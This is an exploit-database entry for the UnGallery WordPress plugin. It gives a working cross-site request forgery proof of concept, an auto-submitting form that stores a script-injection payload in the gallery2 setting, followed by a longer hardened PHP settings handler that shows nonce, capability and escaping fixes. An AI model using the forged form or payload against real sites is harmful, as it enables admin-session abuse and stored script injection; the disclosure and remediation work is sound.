## https://sploitus.com/exploit?id=WPEX-ID:5A348B5D-13AA-40C3-9D21-0554683F8019
Make a logged-in admin open an HTML file containing the following:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=ungallerysettings" method="POST"> 
        <input type="hidden" name="mt_submit_hidden" value="Y">
        <input type="hidden" name="images_path" value="/var/www/html/wp-content/uploads/2024/01/*">
        <input type="hidden" name="URI" value="<? print get_bloginfo('url'); ?>/" >
        <input type="hidden" name="gallery" value="ungallery">
        <input type="hidden" name="version" value="2.2.4">
        <input type="hidden" name="gallery2" value='"><script>alert(2)</script>'>
        <input type="hidden" name="cache_dir" value="/var/www/html/wp-content/cache/">
        <button type="submit">Save Changes</button>
    </form>
</body>
```
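The form above changes settings from another origin, and its `gallery2` value is built to break out of an HTML attribute, so the fix has two parts: a nonce and capability check on save, and escaping on output. The following is an added sketch of a hardened settings handler, not UnGallery's own code. It assumes it runs inside a WordPress admin page; the field names come from the form above, while the `ungallery_example_*` function, nonce and option names are hypothetical.

```php
<?php
// Added example: hypothetical hardened settings page, not the plugin's code.
// Field names are taken from the form above; all ungallery_example_* names are assumptions.

function ungallery_example_fields() {
    return array( 'gallery', 'gallery2', 'images_path', 'cache_dir' );
}

function ungallery_example_save_settings() {
    if ( ! isset( $_POST['mt_submit_hidden'] ) || 'Y' !== $_POST['mt_submit_hidden'] ) {
        return; // Not a save request.
    }
    // Only administrators may change plugin settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // Dies unless the request carries a nonce minted for this user and action.
    // A form hosted on another origin cannot read or predict that value.
    check_admin_referer( 'ungallery_example_save', 'ungallery_example_nonce' );

    foreach ( ungallery_example_fields() as $field ) {
        if ( isset( $_POST[ $field ] ) ) {
            // Strip tags and control characters before storing the value.
            $value = sanitize_text_field( wp_unslash( $_POST[ $field ] ) );
            update_option( 'ungallery_example_' . $field, $value );
        }
    }
}

function ungallery_example_settings_page() {
    ungallery_example_save_settings();
    ?>
    <form method="post">
        <?php wp_nonce_field( 'ungallery_example_save', 'ungallery_example_nonce' ); ?>
        <input type="hidden" name="mt_submit_hidden" value="Y">
        <?php foreach ( ungallery_example_fields() as $field ) : ?>
            <?php $stored = get_option( 'ungallery_example_' . $field, '' ); ?>
            <!-- esc_attr() encodes quotes and angle brackets, so a stored
                 value cannot close the attribute and inject markup. -->
            <input type="text" name="<?php echo esc_attr( $field ); ?>"
                   value="<?php echo esc_attr( $stored ); ?>">
        <?php endforeach; ?>
        <?php submit_button( 'Save Changes' ); ?>
    </form>
    <?php
}
```

Sanitizing on save and escaping on output are both kept on purpose: values already stored before the fix are still rendered safely.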